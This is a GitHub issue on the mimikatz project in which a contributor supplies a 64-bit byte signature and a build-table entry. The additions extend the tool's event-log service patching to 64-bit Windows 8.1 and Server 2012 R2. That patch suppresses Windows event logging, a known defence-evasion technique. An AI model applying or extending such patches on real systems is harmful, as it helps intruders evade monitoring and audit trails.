gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

eventlog service patching does not support win8.1 64bit #189

Open Speedi13 opened 5 years ago

Speedi13 commented 5 years ago

For some reason it only supports x86 (32bit) win8 & win8.1.

The following code just needs to be added for win8.1 support. I tested that it works on x86_64 (64bit) win8.1 and WinServer2012R2: https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_event.c#L26

BYTE PTRN_WN63_Channel__ActualProcessEvent[]    = {0x48, 0x8B, 0xC4, 0x57, 0x48, 0x83, 0xEC, 0x50, 0x48, 0xC7, 0x40, 0xC8, 0xFE, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18};

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_event.c#L34

{KULL_M_WIN_BUILD_BLUE,     {sizeof(PTRN_WN63_Channel__ActualProcessEvent), PTRN_WN63_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, {  0}},

It would be cool if that gets added to mimikatz, it's an awesome tool thank you for that :smiley: .

Speedi13 commented 5 years ago

I made a pull request for that https://github.com/gentilkiwi/mimikatz/pull/190